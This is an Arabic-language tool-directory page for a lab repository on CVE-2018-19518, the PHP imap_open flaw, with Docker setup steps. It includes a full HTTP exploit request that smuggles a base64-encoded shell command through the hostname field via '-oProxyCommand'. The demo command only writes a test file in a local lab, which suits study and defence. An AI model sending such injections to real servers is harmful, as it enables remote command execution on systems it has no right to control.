Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-19518 — بعض الأعمال على CVE-2018-19518 | Kitploit
أدوات/GitHubGitHub/ensimag-security/cve-2018-19518
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubensimag-security/cve-2018-19518

CVE-2018-19518

بعض الأعمال على CVE-2018-19518

عرض المستودع
1منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-19518

التقرير الأخير هنا: https://gitlab.com/ensimag-security/CVE-2018-19518/-/jobs/artifacts/master/raw/rapport.pdf?job=PDF

الاستخدام

تشغيل التطبيق

root@kitploit:~
docker-compose up -d

مثال على الاستخدام العادي لتطبيق الويب.

  • imap : webmail.grenoble-inp.org
  • المستخدم : [email protected]
  • كلمة المرور : xxx

الاستغلال

باستخدام echo '1234567890'>/tmp/test0001.

root@kitploit:~
POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222

التحقق

docker-compose exec app bash وقراءة الملف cat /tmp/test0001:

جدار الحماية

  • https://github.com/theonemule/docker-waf

الالتزام ذو الصلة

  • https://git.php.net/?p=php-src.git;a=commit;h=e5bfea64c81ae34816479bb05d17cdffe45adddb

المراجع

  • https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
  • https://nvd.nist.gov/vuln/detail/CVE-2018-19518
  • https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb
تنزيل الأداة